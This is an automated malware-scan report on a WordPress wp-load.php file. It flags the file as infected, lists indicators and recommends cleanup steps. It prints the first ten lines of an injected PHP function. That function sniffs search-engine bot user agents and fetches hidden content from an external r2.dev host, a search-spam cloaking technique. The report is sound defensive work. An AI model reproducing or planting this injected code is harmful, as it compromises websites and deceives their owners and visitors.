============================================================ WordPress wp_load.php Security Analysis Report ============================================================ File: wp-load.php Size: 4,745 bytes Verdict: MALICIOUS - INFECTED Confidence: HIGH ⚠️ MALICIOUS INDICATORS FOUND: - function profile_user() - $_SERVER['HTTP_USER_AGENT'] - Google-InspectionTool - googlebot - bingbot - AhrefsBot - file_get_contents($content) - pub-f3b300ffa2844e4c93536f3f25bdac26.r2.dev - extraoficial.mx.html ✅ LEGITIMATE INDICATORS FOUND: - Bootstrap file for setting the ABSPATH constant - loading the wp-config.php file - wp-settings.php file - WordPress environment ANALYSIS DETAILS: • File starts with suspicious profile_user() function • Contains bot detection and external content serving FIRST 10 LINES OF FILE: ---------------------------------------- 01: <?php 02: function profile_user() { 03: $useragent = $_SERVER['HTTP_USER_AGENT']; 04: $content = "https://pub-f3b300ffa2844e4c93536f3f25bdac26.r2.dev/extraoficial.mx.html"; 05: $isGoogleBot = strpos($useragent, 'Google-InspectionTool') !== false || 06: strpos($useragent, 'googlebot') !== false || 07: strpos($useragent, '(compatible; Googlebot/2.1; +http://www.google.com/bot.html)') !== false; 08: $isOtherBot = strpos($useragent, 'bingbot') !== false || 09: strpos($useragent, 'AhrefsBot') !== false; 10: if ($isGoogleBot) { ---------------------------------------- 🚨 SECURITY ALERT 🚨 This file appears to be infected with malicious code! RECOMMENDED ACTIONS: 1. Backup your current wp_load.php file 2. Replace it with a clean version from WordPress core 3. Scan your entire WordPress installation for other infected files 4. Change all passwords and update WordPress core/plugins 5. Consider professional malware removal services ============================================================